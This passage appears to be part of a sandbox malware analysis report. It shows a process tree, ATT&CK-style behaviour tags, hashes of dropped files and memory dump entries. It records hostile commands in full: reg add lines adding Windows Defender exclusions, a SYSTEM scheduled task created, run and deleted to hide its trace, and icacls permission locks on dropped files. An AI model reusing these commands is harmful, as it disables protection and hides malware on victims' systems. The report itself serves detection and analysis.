                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:5080
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\GHgGnw\image.png" /inheritance:r
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:3584
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    PID:4456
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4512
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                        PID:4880
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3740
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:5108
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\GHgGnw\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4584
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:2312
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\GHgGnw\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4536
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\thumbs.db" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:4932
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\GHgGnw\thumbs.db" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:1988
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:3312
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\GHgGnw\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:624
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:2992
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\GHgGnw\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:2120
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\XPSPLOG.dll" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:2720
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\GHgGnw\XPSPLOG.dll" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:628
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:4520
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\GHgGnw\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:3300
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:3152
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\GHgGnw\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:2640
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4052
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:1056
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe
                                  1⤵
                                    PID:2680
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:3856
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:888
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:4864
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:3556
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:2872
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:4500
                                  • C:\Program Files (x86)\cZLdHZ51V\yye17.exe
                                    "C:\Program Files (x86)\cZLdHZ51V\yye17.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:3556
                                  • C:\Program Files (x86)\GHgGnw\GHgGnw.exe
                                    "C:\Program Files (x86)\GHgGnw\GHgGnw.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:4144
                                  • C:\Program Files (x86)\GHgGnw\GHgGnw.exe
                                    "C:\Program Files (x86)\GHgGnw\GHgGnw.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:3860
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    PID:5016
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      2⤵
                                        PID:4472
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4808
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:1916
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3104
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:1500
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:392
                                    • C:\Program Files (x86)\cZLdHZ51V\yye17.exe
                                      "C:\Program Files (x86)\cZLdHZ51V\yye17.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:3412
                                    • C:\Program Files (x86)\GHgGnw\GHgGnw.exe
                                      "C:\Program Files (x86)\GHgGnw\GHgGnw.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:3888

                                    Network

                                          MITRE ATT&CK Enterprise v16

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          e58abdc.rbs

                                          • Path C:\Config.Msi\e58abdc.rbs
                                          • Size 7KB
                                          • SHA256 c0554f53b52044d3bb65b655e37625951eb5c5b0666f20f4b59c830b77340906
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          GHgGnw.exe

                                          • Path C:\Program Files (x86)\GHgGnw\GHgGnw.exe
                                          • Size 145KB
                                          • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\GHgGnw\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 ddcb55eec5d683a5fc35bd2cfed7fc4dfc132c056a5999665011cd2a597ed346
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\GHgGnw\image.png
                                          • Size 5.0MB
                                          • SHA256 47cec8444e94589d0d2354eeed771bd2223b7f4761a102f206c59c0339b021ce
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          thumbs.db

                                          • Path C:\Program Files (x86)\GHgGnw\thumbs.db
                                          • Size 358KB
                                          • SHA256 7fcbd6cff4c6da409aff68db8c6c0fc9c6ba236498a59e05a67f05fbb07fd28e
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\cZLdHZ51V\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 c7eb474ec1cd1bde3da180354bae4212096e5a77220dd47a59eddf3000ba53fa
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\cZLdHZ51V\image.png
                                          • Size 5.0MB
                                          • SHA256 1631b22314c4a0c59d0df88b716e61bd2e7e62e0e83e22092a763a482e19f51f
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          __PSScriptPolicyTest_0zkuociu.t34.ps1

                                          • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0zkuociu.t34.ps1
                                          • Size 60B
                                          • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                          • MD5 SHA1 SHA512 TLSH

                                          destopbak.ini

                                          • Path C:\Users\Public\Music\destopbak.ini
                                          • Size 2B
                                          • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                          • MD5 SHA1 SHA512

                                          UxEnhance64.dll

                                          • Path C:\Users\Public\eaeRes\UxEnhance64.dll
                                          • Size 3.1MB
                                          • SHA256 56d103077a1722a93cba7eac7422b7d9b5219fe8a360e2b65e72b5f74f0d8ff6
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          adoresd.dat

                                          • Path C:\Users\Public\eaeRes\adoresd.dat
                                          • Size 4.7MB
                                          • SHA256 67ae5704f391340c2736a095251fec64c0d06bc0e4ce8826629d8fcd21dfafca
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          m8CyIV.exe

                                          • Path C:\Users\Public\eaeRes\m8CyIV.exe
                                          • Size 135KB
                                          • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          msadox.tb

                                          • Path C:\Users\Public\eaeRes\msadox.tb
                                          • Size 8KB
                                          • SHA256 d14e3e61957ba142d64830b63418ce816e76e4c25449539a5cebb5bcd5f84c7f
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          MSIAD82.tmp

                                          • Path C:\Windows\Installer\MSIAD82.tmp
                                          • Size 5.3MB
                                          • SHA256 5f9cc0f4f7e1d78846d8234272210b9d1f608088f79cbeabcfa9b029e1197c46
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          e58abdb.msi

                                          • Path C:\Windows\Installer\e58abdb.msi
                                          • Size 5.3MB
                                          • SHA256 a6377e384d032783d8cd22d371f7c983dca2de11c0367645fa7be95da5d88458
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          metadata-2

                                          • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                          • Size 24.1MB
                                          • SHA256 472fd122ed008e1467e352f7ee4aafe214e5b810148e3eacdd27fe720d984469
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          {177f407d-3fb9-439d-a56d-d671e34e77df}_OnDiskSnapshotProp

                                          • Path \??\Volume{63ef4f52-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{177f407d-3fb9-439d-a56d-d671e34e77df}_OnDiskSnapshotProp
                                          • Size 6KB
                                          • SHA256 6bfb627c06aac51aad21d615f7cff821cb88e8683b992949d0adae5610071637
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          memory/1072-61-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-69-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-71-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-70-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-63-0x00007FFC20DE0000-0x00007FFC20DE2000-memory.dmp

                                          memory/1072-75-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-84-0x0000023278530000-0x00000232785BA000-memory.dmp

                                          memory/1072-83-0x0000023278530000-0x00000232785BA000-memory.dmp

                                          memory/1072-82-0x0000023278530000-0x00000232785BA000-memory.dmp

                                          memory/1072-81-0x0000023278530000-0x00000232785BA000-memory.dmp

                                          memory/1072-80-0x0000023276E80000-0x0000023276ECE000-memory.dmp

                                          memory/1072-89-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-90-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-68-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-64-0x00000232778C0000-0x0000023278151000-memory.dmp

                                          memory/1072-56-0x00007FFC01250000-0x00007FFC0176E000-memory.dmp

                                          memory/1072-55-0x00007FFC20DD0000-0x00007FFC20DD2000-memory.dmp

                                          memory/3412-310-0x0000000000400000-0x0000000000401000-memory.dmp

                                          memory/3412-294-0x0000000000400000-0x0000000000401000-memory.dmp

                                          memory/3412-302-0x00000000007A0000-0x00000000007A1000-memory.dmp

                                          memory/3412-295-0x0000000072500000-0x0000000072C4A000-memory.dmp

                                          memory/3412-303-0x0000000002D80000-0x0000000003587000-memory.dmp

                                          memory/3412-298-0x0000000002D80000-0x0000000003587000-memory.dmp

                                          memory/3556-237-0x0000000073110000-0x000000007385A000-memory.dmp

                                          memory/3556-251-0x0000000001600000-0x0000000001601000-memory.dmp

                                          memory/3556-255-0x00000000014E0000-0x00000000014E1000-memory.dmp

                                          memory/3556-252-0x0000000003950000-0x0000000004157000-memory.dmp

                                          memory/3556-236-0x00000000014E0000-0x00000000014E1000-memory.dmp

                                          memory/3556-249-0x0000000003950000-0x0000000004157000-memory.dmp

                                          memory/3604-38-0x00007FFC110C0000-0x00007FFC110D0000-memory.dmp

                                          memory/3604-16-0x00007FFC110C0000-0x00007FFC110D0000-memory.dmp

                                          memory/3604-13-0x00007FFC028B0000-0x00007FFC02EE2000-memory.dmp

                                          memory/3604-12-0x00007FFC20DD0000-0x00007FFC20DD2000-memory.dmp

                                          memory/3860-239-0x0000000000D50000-0x0000000000D51000-memory.dmp

                                          memory/3860-240-0x0000000075070000-0x00000000757BA000-memory.dmp

                                          memory/3888-317-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

                                          memory/3888-307-0x0000000075070000-0x00000000757BA000-memory.dmp

                                          memory/3888-306-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

                                          memory/3888-313-0x0000000000E00000-0x0000000000E01000-memory.dmp

                                          memory/3888-314-0x0000000003270000-0x0000000003A77000-memory.dmp

                                          memory/3888-311-0x0000000003270000-0x0000000003A77000-memory.dmp

                                          memory/4144-244-0x0000000000D60000-0x0000000000D61000-memory.dmp

                                          memory/4144-245-0x0000000075070000-0x00000000757BA000-memory.dmp

                                          memory/4312-273-0x0000000006630000-0x000000000667C000-memory.dmp

                                          memory/4312-262-0x0000000005E00000-0x0000000005E66000-memory.dmp

                                          memory/4312-263-0x0000000005FA0000-0x0000000006006000-memory.dmp

                                          memory/4312-261-0x0000000005730000-0x0000000005752000-memory.dmp

                                          memory/4312-271-0x0000000006010000-0x0000000006364000-memory.dmp

                                          memory/4312-272-0x0000000006600000-0x000000000661E000-memory.dmp

                                          memory/4312-260-0x00000000057D0000-0x0000000005DF8000-memory.dmp

                                          memory/4312-274-0x0000000006BC0000-0x0000000006BF2000-memory.dmp

                                          memory/4312-283-0x0000000006C00000-0x0000000006C1E000-memory.dmp

                                          memory/4312-275-0x0000000073150000-0x000000007319C000-memory.dmp

                                          memory/4312-284-0x00000000077F0000-0x0000000007893000-memory.dmp

                                          memory/4312-285-0x0000000007F50000-0x00000000085CA000-memory.dmp

                                          memory/4312-286-0x0000000007910000-0x000000000792A000-memory.dmp

                                          memory/4312-287-0x0000000007970000-0x000000000797A000-memory.dmp

                                          memory/4312-288-0x0000000007BA0000-0x0000000007C36000-memory.dmp

                                          memory/4312-289-0x0000000007B10000-0x0000000007B21000-memory.dmp

                                          memory/4312-259-0x0000000005020000-0x0000000005056000-memory.dmp

                                          memory/4564-257-0x00000000035F0000-0x0000000003DF7000-memory.dmp

                                          memory/4564-219-0x00000000035F0000-0x0000000003DF7000-memory.dmp

                                          memory/4564-201-0x0000000010000000-0x0000000010061000-memory.dmp

                                          memory/4564-193-0x00000000035F0000-0x0000000003DF7000-memory.dmp

                                          memory/4564-192-0x0000000002BC0000-0x0000000002BD4000-memory.dmp

                                          memory/4564-185-0x00000000035F0000-0x0000000003DF7000-memory.dmp

                                          memory/4564-181-0x00000000035F0000-0x0000000003DF7000-memory.dmp

                                          memory/4564-180-0x00000000010C0000-0x00000000010C1000-memory.dmp

                                          memory/4564-178-0x00000000035F0000-0x0000000003DF7000-memory.dmp

                                          memory/4564-173-0x00000000010A0000-0x00000000010A1000-memory.dmp

                                          memory/4564-174-0x0000000075070000-0x00000000757BA000-memory.dmp